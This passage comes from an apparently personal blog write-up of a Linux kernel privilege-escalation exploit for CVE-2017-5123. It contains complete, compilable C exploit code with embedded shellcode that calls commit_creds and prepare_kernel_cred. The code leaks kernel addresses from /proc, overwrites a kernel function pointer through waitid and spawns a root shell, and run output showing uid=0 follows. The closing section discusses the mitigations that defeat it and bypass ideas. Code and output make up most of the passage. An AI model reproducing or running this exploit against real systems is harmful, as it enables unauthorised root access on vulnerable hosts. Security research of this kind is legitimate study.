                      "\x42\x42\x42\x42\xff\xd1\xc3";
    unsigned long   *sc0;
    unsigned long   *sc1;

    sc0 = (unsigned long*) &shellcode[17];
    sc1 = (unsigned long*) &shellcode[32];
    if ((*sc0 = get_kernel_sym("prepare_kernel_cred")) &&
        (*sc1 = get_kernel_sym("commit_creds")))
    {
        memcpy((void *)mem, shellcode, sizeof(shellcode));
        printf("[+] Shellcode modified and dropped to %#lx\n", mem);
    }
    else
        exw(EXIT_FAILURE, "[!] Can't retrieve symbol!");
}

Now we just have to trigger the overwritten function pointer, which now points to the shellcode, by calling shutdown() on the socket's fd.

The code of the exploit is very simple; I tried to keep it clear and readable:

[phenol@Lab cve]$ cat CVE-2017-5123.c 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>

#define SOCKETSTRUCT_OFFSET (sizeof(unsigned long) * 82)

void    exw(int code, char *s)
{
    printf("%s\n", s);
    exit(code);
}

unsigned long get_kernel_sym(char *name)
{
    FILE        *f;
    unsigned long   addr;
    char        dummy;
    char        sname[256];

    if ((f = fopen("/proc/kallsyms", "r")) == NULL)
        exw(EXIT_FAILURE, "[-] Failed to open /proc/kallsyms"); 
    while(fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname) != EOF)
    {
        if (!strcmp(name, sname))
        {
            fclose(f);
            printf("[+] Found %s at %#lx\n", name, addr);
            return addr;
        }
    }
    fclose(f);
    printf("[!] Can't find %s\n", name);
    return 0;
}

int create_listening_tcp(void)
{
    int                 socket_desc;
    struct sockaddr_in  server;

    socket_desc = socket(AF_INET, SOCK_STREAM, 0);
    if (socket_desc == -1)
        exw(EXIT_FAILURE, "[!] Can't create socket");
    /* zero the struct so sin_zero does not hold stack garbage */
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(8888);
    if (bind(socket_desc, (struct sockaddr *)&server, sizeof(server)) < 0)
        exw(EXIT_FAILURE, "[!] Can't bind socket");
    if (listen(socket_desc, 3) < 0)
        exw(EXIT_FAILURE, "[!] Can't listen on socket");
    printf("[+] Listening TCP sock on port 8888\n");
    return (socket_desc);
}

unsigned long   leak_sock_struct(int sock_inode)
{
    FILE            *f;
    unsigned long   addr;
    int             inode;
    char            s0[256];

    if ((f = fopen("/proc/net/tcp", "r")) == NULL)
        exw(EXIT_FAILURE, "[-] Failed to open /proc/net/tcp");
    /* skip the column headers; the padding that follows is whitespace,
     * which fscanf ignores */
    fseek(f, 97, SEEK_SET);
    /* field 10 is the inode, field 12 the struct sock address */
    while (fscanf(f, "%s %s %s %s %s %s %s %s %s %d %s %p %s %s %s %s %s\n",
        s0, s0, s0, s0, s0, s0, s0, s0, s0, &inode, s0, (void**)&addr,
        s0, s0, s0, s0, s0) != EOF)
    {
        if (sock_inode == inode)
        {
            fclose(f);
            printf("[+] Found sock struct at %#lx\n", addr);
            return (addr);
        }
    }
    fclose(f);
    printf("[!] Can't find socket by inode %d\n", sock_inode);
    return (0);
}

void    build_shellcode(unsigned long mem)
{
    char        shellcode[] = "\x48\x31\xd2\x48\x31\xff\x48\x31\xf6\x48\x31\xc9"
                      "\x48\x31\xc0\x48\xbb\x41\x41\x41\x41\x41\x41\x41"
                      "\x41\xff\xd3\x48\x89\xc7\x48\xb9\x42\x42\x42\x42"
                      "\x42\x42\x42\x42\xff\xd1\xc3";
    unsigned long   *sc0;
    unsigned long   *sc1;

    sc0 = (unsigned long*) &shellcode[17];
    sc1 = (unsigned long*) &shellcode[32];
    if ((*sc0 = get_kernel_sym("prepare_kernel_cred")) &&
        (*sc1 = get_kernel_sym("commit_creds")))
    {
        memcpy((void *)mem, shellcode, sizeof(shellcode));
        printf("[+] Shellcode modified and droped to %#lx\n", mem);
    }
    else
        exw(EXIT_FAILURE, "[!] Can't retrieve symbol!");
}

void    *map_memory(unsigned long target_map, size_t len)
{
    void    *addr;

    addr = mmap((void*)target_map, 4096 * ((len / 4096) + (len % 4096)), PROT_WRITE | PROT_EXEC | PROT_READ, MAP_ANON | MAP_FIXED | MAP_PRIVATE, -1, 0);
    if (addr != MAP_FAILED)
    {
        printf("[+] Successfully mapped memory at %#lx of size %#lx\n", target_map, 4096 * ((len / 4096) + (len % 4096)));
        return (addr);
    }
    else
        exw(EXIT_FAILURE, "[!] Failed to mmap memory\n");
    return (0);
}

void    exploit(unsigned long addr)
{
    pid_t           frk;
    siginfo_t       *infop;
    unsigned long   mapaddr;

    if ((frk = fork()) == -1)
        exw(EXIT_FAILURE, "[!] fork failed.");
    if (frk == 0)
        exit(0xde);
    else
    {
        mapaddr = getuid();
        mapaddr = mapaddr << (4 * 8);
        map_memory(mapaddr, frk);
        mapaddr |= frk;
        build_shellcode(mapaddr);
        printf("[+] Overwriting at %#lx with %#lx\n", addr, mapaddr);
        infop = (siginfo_t*)(addr - (24 - 8));
        waitid(P_PID, frk, infop, WEXITED | WSTOPPED | WCONTINUED);
    }
}

void    get_shell(void)
{
    char *ar[] = {"/bin/sh", NULL};

    if (getuid() != 0)
        exw(EXIT_FAILURE, "[!] Failed to get root.\n");
    printf("[+] Got root :) Enjoy ur shell\n");
    execve(ar[0], ar, NULL);
}

int main(void)
{
    int             sockfd;
    struct stat     statbuf;
    unsigned long   target_ptr;

    printf("[.] CVE-2017-5123 exploit by Phenol @BFF\n");

    sockfd = create_listening_tcp();
    fstat(sockfd, &statbuf);
    target_ptr = leak_sock_struct(statbuf.st_ino) + SOCKETSTRUCT_OFFSET;
    exploit(target_ptr);
    shutdown(sockfd, SHUT_RDWR);
    get_shell();
    return (0);
}

[phenol@Lab cve]$ gcc -static -Wall -Werror -Wextra -o cve20175123 CVE-2017-5123.c

And now in our VM:

/ $ /share/cve20175123 
[.] CVE-2017-5123 exploit by Phenol @BFF
[+] Listening TCP sock on port 8888
[+] Found sock struct at 0xffff88001e304000
[+] Successfully mapped memory at 0x3e800000000 of size 0x3db000
[+] Found prepare_kernel_cred at 0xffffffff81077380
[+] Found commit_creds at 0xffffffff81077000
[+] Shellcode modified and droped to 0x3e8000003db
[+] Overwriting at 0xffff88001e304290 with 0x3e8000003db
[+] Got root :) Enjoy ur shell
/ # id
uid=0(root) gid=0
/ # 

IV) Limits of the exploit and conclusion

To judge how reliable the exploit is, we need to know the common kernel protection mechanisms. There are several; we will only look at the most common ones.

  • mmap_min_addr: this sets the lowest address that a process is allowed to map. It is very effective at defeating the exploitation of NULL pointer dereferences, and it is also the protection that makes the hexpresso exploit useless, because nowadays practically all Linux systems ship with a minimal mmap value of 4096 or more.

  • KASLR: like ASLR for userland programs, KASLR (Kernel Address Space Layout Randomization) randomizes the base address of the kernel at each boot. To locate interesting symbols such as prepare_kernel_cred and commit_creds, we need a leak that reveals the base address.

  • kptr_restrict: this protection prevents kernel addresses from leaking through the /proc filesystem. When it is enabled, my exploit fails to leak the sock struct address, and it cannot get the addresses of prepare_kernel_cred and commit_creds either. The way around it is to find another leak, for example addresses printed in the syslog, or an information leak bug in the kernel.

  • SMEP: Supervisor Mode Execution Prevention, a CPU feature that Intel introduced with the Ivy Bridge microarchitecture. It raises a fault if the kernel tries to execute code located in userspace, which completely breaks my exploit. It can be bypassed with a ROP chain that clears bit 20 of the CR4 register. Unfortunately I haven't found a way to write 8 contiguous controlled bytes, so I can't ROP or call native_write_cr4... You can check whether your CPU has SMEP with: cat /proc/cpuinfo | grep smep. My Intel i5 M520 doesn't have it :(

  • SMAP: like SMEP, SMAP (Supervisor Mode Access Prevention) raises a fault whenever the kernel accesses userspace memory outside of the code paths that explicitly allow it. This also breaks my exploit. It can be bypassed by clearing bit 21 of the CR4 register.

So my exploit isn't very reliable: it fails on systems with kptr_restrict, SMEP or SMAP. My hardware is rather old and has neither SMEP nor SMAP, and the default Arch Linux kernel comes without kptr_restrict, so at home the exploit is reliable, but it won't work on modern hardware with a properly configured and hardened kernel. Still, it was fun, and I'm still trying to figure out a way to bypass SMEP and SMAP (ROP), which requires being able to write 8 fully controlled contiguous bytes...

Thanks for reading! If you find an error or have an improvement to suggest, please contact me.

Some very interesting resources that helped me:

Exploitation du kernel pour les NULL
Linux Kernel Modern exploitation
Linux Kernel x86-64 bypass SMEP - KASLR - kptr_restric
